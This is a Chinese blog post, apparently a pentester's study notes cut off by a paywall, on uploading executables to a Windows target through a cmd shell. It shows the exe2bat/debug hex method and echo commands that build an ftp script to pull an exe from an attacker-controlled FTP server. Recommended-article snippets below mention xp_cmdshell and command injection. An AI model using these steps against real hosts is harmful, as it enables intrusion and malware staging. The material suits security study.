cmd echo写入shell_渗透技巧——通过cmd上传文件的N种方法

最新推荐文章于 2022-12-28 11:21:41 发布
最新推荐文章于 2022-12-28 11:21:41 发布
阅读量543 收藏 1
点赞数
文章标签: cmd echo写入shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34570232/article/details/112956916
版权

0x00 前言

在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。

0x02 测试环境

OS:Win7 x86

test exe:ssss2.exe,成功运行后输出1

0x03 通用上传方法

1、 debug

debug是一个程序调试工具,功能包括:

直接输入,更改,跟踪,运行汇编语言源程序

观察操作系统的内容

查看ROM BIOS的内容

观察更改RAM内部的设置值

以扇区或文件的方式读写软盘数据

特别的是它还有一个功能可以将十六进制代码转换为可执行文件:

结合本文的目标,思路如下:

把需要上传的exe转换成十六进制hex的形式

通过echo命令将hex代码写入文件

使用debug功能将hex代码还原出exe文件

实际测试:

kali中的exe2bat.exe提供了这个功能,位于/usr/share/windows-binaries

如图

操作步骤:

kali:

[code]

cd /usr/share/windows-binaries

wine exe2bat.exe ssss2.exe ssss2.txt

[/code]

执行后会生成ssss2.txt,将里面的内容复制粘贴到cmd命令行下依次执行

执行后会生成1.dll、123.hex、ssss.exe

如图

注:

exe2bat不支持大于64kb的文件

如图

2、ftp

搭建好ftp服务器:

ip:192.168.174.151

文件:ssss2.exe

按顺序执行如下代码即可通过ftp来下载文件

cmd:

[code]

echo open 192.168.174.151 21> ftp.txt

echo ftp>> ftp.txt

echo bin >> ftp.txt

echo ftp>> ftp.txt

echo GET ssss2.exe >> ftp.txt

ftp -s:ftp.txt

[/code]

如图

注:

初次使用ftp下载防火墙会弹框拦截,使用前记得要先添加防火墙规则

3、vbs

最低0.47元/天 解锁文章
Vanessa Chen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cmd echo写入shell_学习笔记-命令执行及花式bypassshell
weixin_30801745的博客
01-26 1721
命令执行的坑其实早就想填了。最早是因为校赛时,easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后一层却没拿到flag。当时十分不爽,下定决心要好好了解下命令执行的相关知识点。关于命令执行我大体上归为php绕过+rce两类。php的难点主要是在绕过shell上,而linux的知识主要在RCE达成上。先从简单说起:linux 命令& RCErce,即remote comma...
JG-OJ记录97:5:特别的数字-7
Fei_WuYan的博客
10-21 606
描述 判断一个数字是不是既大于10,又是3的倍数。 输入 一个正整数n,表示有n组案例。 在每组案例中有一个整数a,表示要判断的数字。 输出 针对每组案例,如果a既大于10,又是3的倍数,则输出Yes,否则输出No。每组案例输出完都要换行。 样例输入复制样例 3 9 12 14 样例输出 No Yes No HINT 解: ...
cmd新建文件及文件夹
热门推荐
disanempire的博客
03-02 3万+
###整理备份一、建立空文件的几方法 1、cd.>a.txt cd.表示改变当前目录为当前目录,即等于没改变;而且此命令不会有输出。 >表示把命令输出写入到文件。后面跟着a.txt,就表示写入到a.txt。 而此例中命令不会有输出,所以就创建了没有内容的空文件。 2、copy nul a.txt nul表示空设备,从概念上讲,它不可见,存在于每个目录中,可以把它看成一个特殊的“文件...
xp_cmdshell 用法
wyf
11-05 706
xp_cmdshell 以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出。授予非管理用户执行 xp_cmdshell 的权限。 说明 在 Microsoft® Windows® 95 或 Microsoft Windows 98 操作系统中...
关于xp_cmdshell
qq_42036164的博客
12-28 979
xpcmdshell
mysql xp_cmdshell_利用xp_cmdshell 结合 DOS的ECHO和输出重定向,了一个磁盘文件的存储过程。...
weixin_39900736的博客
02-27 177
CREATE PROCEDURE writeInfo@info varchar(8000),--要写入的信息的内容@fName varchar(8000),--要写入信息的文件的文件名。@Append int=0--,是否追加到现有文件。0,创建新的文件,1,追加到现有文件。asdeclare @tmpFile varchar(8000)--临时文件declare @cmd varchar(800...
php一句话cmdshell新型 (非一句话木马)
10-30
行为可能导致严重的安全问题,因为攻击者可以通过操纵 `id` 参数来注入任意命令,从而执行他们想要的操作,例如读取、写入或删除文件,甚至控制整个服务器。 **安全性问题:** 1. **命令注入**:攻击者可以...
rust_cmd_lib:常见的rust命令行宏和实用程序,以干净,自然和生锈的方式编类似于shell脚本的任务
01-30
`宏执行了一个`echo`命令,然后通过`pipe`方法创建了一个命令链,实现了`ls`、`grep`和`sort`的组合,类似于shell中的操作。 ### 结论 `rust_cmd_lib` 为Rust开发者提供了一个强大的工具集,使他们能够在保持Rust...
php使用exec shell命令注入的方法讲解
12-18
// 用户可以通过URL参数'cmd'提供命令 exec($command, $output, $return); print_r($output); echo "Return [$return]"; ?> ``` 在这个例子中,任何访问此页面的用户都可以通过`cmd`参数执行任意命令。如果用户...
执行bat文件,并打印执行结果,类似cmd.rar
04-19
在Windows操作系统中,批处理(BAT)文件是一文本文件,其中包含了可以连续执行的一系列命令。这些命令通常用于自动化常见的任务,例如复制文件、创建目录或运行程序。本主题将详细探讨如何执行BAT文件并捕获其...
Windows10无线热点cmd设置
10-25
在Windows 10操作系统中,用户可以通过命令提示符(CMD)来快速设置并启用无线热点功能,以便与其他设备共享网络连接。这个过程涉及到系统网络配置、命令行操作以及批处理文件的应用。以下将详细讲解如何利用CMD来...
python对文件的操作_Python对文件的读操作
weixin_39795292的博客
11-22 79
Python使用open函数来读文件,open函数的第一个参数是文件名,第二个参数是可选的,有4常见模式:(1)r打开一个文件来读数据,这是默认模式;(2)w打开一个文件来数据,如果文件已有数据,则会先清空数据;(3)a打开一个文件向文件末尾追加数据;(4)x打开一个新文件来数据,如果文件已存在则失败;第2至4模式如果第一个参数指定的文件不存在,则会先创建一个空文件。例子:1、文件to...
数据库注入提权总结(三)
蚁景网安学院
08-12 4882
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
XP_cmdshell
飞轩亭
08-14 2万+
一、简介        xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。 三、SQL Server 2005中的xp_cmdshell         由于存在安全隐患,所以在SQL Server 2005中, xp_cmdshell 默认是关闭的。        此时,如果执行 xp_cmdshell 将会提示服务未开启:    
vbs解压文件
perfect_bug的博客
02-21 931
直接上代码 Sub UnZip(ByVal myZipFile, ByVal myTargetDir) Set fso = CreateObject("Scripting.FileSystemObject") If NOT fso.FileExists(myZipFile) Then Exit Sub ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then Exit Sub El
利用xp_cmdshell 导出文件到本地和网络路径。
曲军昌的博客
04-07 2988
作者:曲军昌   1.导出到本地: --创建测试文件夹。 master..xp_cmdshell 'mkdir E:\Test\'--导出文件到本地,包括本机的数据库的连接方式。EXEC master..xp_cmdshell 'bcp "Landahz..PRTOBANK " out "\E:\工资文件\文件名称.xls" -c -q -S".\sql2008" -U"sa" -P"
SQL中使用xp_cmdshell将硬盘中文件内容导入数据库
MinSen
03-20 1989
SQL同样拥有读取文件的功能,只要知道如何使用xp_cmdshell组件,即可实现,如下我将用一个简单例子做相关介绍: 首先,要知道xp_cmdshell是一个过于强大的组件,它可以直接以操作系统命令行解释器的方式执行给定的命令字符串,因此SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分
dockerfile的cmd如何使用shell脚本
最新发布
09-18
而如果需要在CMD中使用Shell脚本,可以将脚本内容写入一个单独的Shell文件,然后在Dockerfile中通过CMD命令来调用执行。 首先,创建一个shell脚本文件,例如test.sh,并写入需要执行的Shell命令,比如: ``` #!/bin...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值